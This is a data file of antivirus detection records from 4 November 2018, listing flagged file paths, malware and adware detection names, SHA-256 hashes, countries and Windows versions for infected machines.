  Row(detection=Row(filename='junk store_pop3e8a42_1cc_3328_1104_pop3_vodafone_ip_de_110.hxml', filepath='\\?\\D:\\Hexamail\\Hexamail POP3 Downloader\\emailjunk\\Junk Store_POP3E8A42_1CC_3328_1104_pop3_vodafone_ip_de_110.hxml', filesize=12000, name='VBS/Dldr.Agent.8061.#M1.#R1'), hash='efd2372c14d17517754b21855910027cb62ccee019d0749113a25f12a0f75a01', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T03:47:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='junk store_pop3e8a42_1cc_3328_1104_pop3_vodafone_ip_de_110.hxml', filepath='\\?\\D:\\Hexamail\\Hexamail POP3 Downloader\\emailjunk\\Junk Store_POP3E8A42_1CC_3328_1104_pop3_vodafone_ip_de_110.hxml', filesize=12000, name='VBS/Dldr.Agent.8061.#M1.#R1'), hash='efd2372c14d17517754b21855910027cb62ccee019d0749113a25f12a0f75a01', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T06:45:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='f037f8c780ea0c3b4e11e3170b698e99790feb6c3a78ea1a02fd226b676d306f', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:18:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='f037f8c780ea0c3b4e11e3170b698e99790feb6c3a78ea1a02fd226b676d306f', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:18:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='17b011b9c119ef58e674df826a442c6abfce9669', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\17b011b9c119ef58e674df826a442c6abfce9669', filesize=2240000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='f046dd36b63b65e63ae5ef4c8f44239e17bedaa7ebf2c02923f60bbde3fc9da6', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:15:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-080341-7a64e54a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_59a51e7e\\AVSCAN-20181104-072801-5B845DE4\\AVSCAN-20181104-080341-7A64E54A', filesize=556000, name='PUA/MPCCleaner.#M1.#R1'), hash='f0507c1b579da388341b7527f761a402b82fd12c078265390a51ddcf1e704edc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T01:03:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-114806-02d99c4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8231814a\\AVSCAN-20181104-112930-403F88DF\\AVSCAN-20181104-114806-02D99C4D', filesize=2112000, name='TR/Crypt.TPM.Gen.#M1.#R1'), hash='f050ff3fee0b12748742d97310dbb48b0b2d9af3646631d8dd0c871105a0f785', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T09:47:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-114945-1415af60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8231814a\\AVSCAN-20181104-112930-403F88DF\\AVSCAN-20181104-114945-1415AF60', filesize=2112000, name='TR/Crypt.TPM.Gen.#M1.#R1'), hash='f050ff3fee0b12748742d97310dbb48b0b2d9af3646631d8dd0c871105a0f785', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T09:49:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195338-6b05ac32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8121bda9\\AVSCAN-20181104-191248-159A46FF\\AVSCAN-20181104-195338-6B05AC32', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:53:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[1].exe', filepath='I:\\Documents and Settings\\X\\Local Settings\\Temporary Internet Files\\Content.IE5\\OJWRYZIV\\Updater_zip_res0301_newmm[1].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline='\\\\\\/Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=19360, timestamp='2018-11-04T14:43:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[1].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:05:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:11:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T00:46:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T12:13:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T22:10:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T19:32:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T11:02:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T14:22:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T18:30:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T17:16:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T13:25:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T23:21:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f0a1e4268e7c9b23965776c74e1128ab68a5bd3a17084034255a67061438d61f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F0A1E4268E7C9B23965776C74E1128AB68A5BD3A17084034255A67061438D61F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f0a1e4268e7c9b23965776c74e1128ab68a5bd3a17084034255a67061438d61f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:14:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dc7d11602e891165cdb4366b046ef348becb7c82', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\dc7d11602e891165cdb4366b046ef348becb7c82', filesize=320000, name='Adware/DealPly.f10c00.#M1.#R1'), hash='f10c007a404dbae3243abd50b27a193be17ae38ebc8bc1de4c5a01e23473df9c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:25:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d21b4ada04f3e213027ab730c6969d1dacaf0cbf', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\d21b4ada04f3e213027ab730c6969d1dacaf0cbf', filesize=320000, name='Adware/DealPly.f10c00.#M1.#R1'), hash='f10c007a404dbae3243abd50b27a193be17ae38ebc8bc1de4c5a01e23473df9c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:52:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='9d0a5093fae1a1a1aa57f7bae87dc26d05b6984d', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\9d0a5093fae1a1a1aa57f7bae87dc26d05b6984d', filesize=320000, name='Adware/DealPly.f10c00.#M1.#R1'), hash='f10c007a404dbae3243abd50b27a193be17ae38ebc8bc1de4c5a01e23473df9c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:45:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ffbe92a1643ba4f8b15a80fe20af9ee76b304e08', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\ffbe92a1643ba4f8b15a80fe20af9ee76b304e08', filesize=320000, name='Adware/DealPly.f10c00.#M1.#R1'), hash='f10c007a404dbae3243abd50b27a193be17ae38ebc8bc1de4c5a01e23473df9c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:36:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='46e1046ae1802769ec9bd7be9f75c4c50853f005', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\46e1046ae1802769ec9bd7be9f75c4c50853f005', filesize=320000, name='Adware/DealPly.f10c00.#M1.#R1'), hash='f10c007a404dbae3243abd50b27a193be17ae38ebc8bc1de4c5a01e23473df9c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:50:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='99166412ebc575f15fb0ada3d735f14287eea8e9', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\99166412ebc575f15fb0ada3d735f14287eea8e9', filesize=320000, name='Adware/DealPly.f10c00.#M1.#R1'), hash='f10c007a404dbae3243abd50b27a193be17ae38ebc8bc1de4c5a01e23473df9c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:03:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='becce27f2365db0cb5bde6efa6b5f7c2b126a4cb', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\becce27f2365db0cb5bde6efa6b5f7c2b126a4cb', filesize=320000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='f10c007a404dbae3243abd50b27a193be17ae38ebc8bc1de4c5a01e23473df9c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:15:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='keygen.exe', filepath='\\\\?\\D:\\programs\\pro 5\\Keygen\\Keygen.exe', filesize=64000, name='TR/Agent.64000.65.#M1.#R1'), hash='f174ab207bf58acca7196b476fb0e2d85b087c5dd3d3b31015e4895128c23de1', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:51:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tripeaks.exe', filepath='C:\\Program Files\\GameHouse\\AncientTripeaks\\Tripeaks.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='f241c5fe912b94290df3a653e8307377511a911a3dd1dbd1769514e13dac4411', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T02:23:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='utorrentie.exe', filepath='C:\\Documents and Settings\\X\\Application Data\\uTorrent\\updates\\3.4.9_42923\\utorrentie.exe', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='f264d200e12fb10b3dd55dce0e31fba01a5919012ea01654d10c477f969e1dc8', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:42:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='liveupdate360.exe', filepath='\\\\?\\C:\\360SANDBOX\\SHADOW\\Program Files (x86)\\360\\Total Security\\LiveUpdate360.exe', filesize=872000, name='W32/Neshta.A.#M1.#R1'), hash='f2b94adda8ff7f24fa6d39b3a6bc358727486df23322bd45b0dbed6850130be0', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:41:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='liveupdate360.exe', filepath='C:\\360SANDBOX\\SHADOW\\Program Files (x86)\\360\\Total Security\\LiveUpdate360.exe', filesize=872000, name='W32/Neshta.A.#M1.#R1'), hash='f2b94adda8ff7f24fa6d39b3a6bc358727486df23322bd45b0dbed6850130be0', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:36:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vcredist_x86.exe', filepath='C:\\FILES\\Adobe Illustrator\\payloads\\Microsoft VC 2008 Redist (x86)\\vcredist_x86.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='f2c12529759fabfc415d49233a2e868c06cd0fd6e10fe903ef1046e92dc25720', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:02:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vcredist_x86.exe', filepath='C:\\FILES\\Adobe Illustrator\\payloads\\Microsoft VC 2008 Redist (x86)\\vcredist_x86.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='f2c12529759fabfc415d49233a2e868c06cd0fd6e10fe903ef1046e92dc25720', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:59:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\MSOCache\\All Users\\{90120000-006E-040C-0000-0000000FF1CE}-C\\dwtrig20.exe', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='f2ffd5f8b1f5bf94dc56f3115a2ed5baf5e7afc428038b42b15e44c09d7ae3d3', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\PROGRA~1\\\\\\\\McAfee\\\\\\\\TrueKey\\\\\\\\MCEC1D~1.EXE\\\\\\" TaskUpdMgr', country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.com', parentsize=41472, timestamp='2018-11-04T22:59:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-175239-35aaf025', filepath='C:\\Dokumente und Einstellungen\\All Users\\Anwendungsdaten\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-163940-91208DC2\\AVSCAN-20181104-175239-35AAF025', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='f34c41752243de42a9999f10d86bcf841eb7690fcfd397f3bf0d94612e910222', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:52:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-170045-58b98e09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_95369046\\AVSCAN-20181104-164332-D4C777B9\\AVSCAN-20181104-170045-58B98E09', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='f34c41752243de42a9999f10d86bcf841eb7690fcfd397f3bf0d94612e910222', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:00:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f37bd445ff5707df09e0ad9fb4e0150a45a26785690bb7de4639d56d4b486d79', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F37BD445FF5707DF09E0AD9FB4E0150A45A26785690BB7DE4639D56D4B486D79', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f37bd445ff5707df09e0ad9fb4e0150a45a26785690bb7de4639d56d4b486d79', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:33:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='drvsetupx64.exe', filepath='f:\\lenovo s10-3 win7\\s10-3 win7\\digital_camera\\bison\\345+6aa\\DrvSetupX64.exe', filesize=512000, name='W64/Infector.Gen8.#M300.#R700956'), hash='f404af549f2ce2e7e84163ee78f10e65a942f4ebbb7183eeeb3f27875eaec5b0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T03:29:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f45ff775783693214a5454f7d42964328450c655c1e295a27f9ebf608767db24', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F45FF775783693214A5454F7D42964328450C655C1E295A27F9EBF608767DB24', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='f45ff775783693214a5454f7d42964328450c655c1e295a27f9ebf608767db24', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:39:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f515e2f31bf3fef5121beb134c8fabdaa917ec78caf029e4fcb9faec68ee1d2f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F515E2F31BF3FEF5121BEB134C8FABDAA917EC78CAF029E4FCB9FAEC68EE1D2F', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='f515e2f31bf3fef5121beb134c8fabdaa917ec78caf029e4fcb9faec68ee1d2f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:43:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='drvmgt.dll', filepath='E:\\Games\\Red Alert2 Gold\\Red Alert2 Gold\\DRVMGT.DLL', filesize=256000, name='W32/Ramnit.CE.#M1.#R1'), hash='f5b768f377cb78da8a5f74b45c2488e049786af50c060e8027d1a5f9710290b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=677024, timestamp='2018-11-04T23:19:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ftx global vector configuration tool.exe', filepath='\\\\?\\H:\\Microsoft Flight Simulator X\\ORBX\\FTX_VECTOR\\FTX GLOBAL VECTOR Configuration Tool.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:38:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f612da637c2f256a08b72b65265240ed835766c19da1bbb82a86e76fd8a43b53', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F612DA637C2F256A08B72B65265240ED835766C19DA1BBB82A86E76FD8A43B53', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f612da637c2f256a08b72b65265240ed835766c19da1bbb82a86e76fd8a43b53', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:48:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f625d34e7133d32be2a1a1d977f33e34d4757933badfdde3834b86ea78986422', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F625D34E7133D32BE2A1A1D977F33E34D4757933BADFDDE3834B86EA78986422', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f625d34e7133d32be2a1a1d977f33e34d4757933badfdde3834b86ea78986422', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:49:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135937-d1432687', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-135937-D1432687', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:59:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134322-166a479a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-134322-166A479A', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:43:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134302-1278bf02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-134302-1278BF02', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:43:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134352-1c196e2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-134352-1C196E2E', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:43:55Z'), dt=datetime.date(2018, 11, 4)),
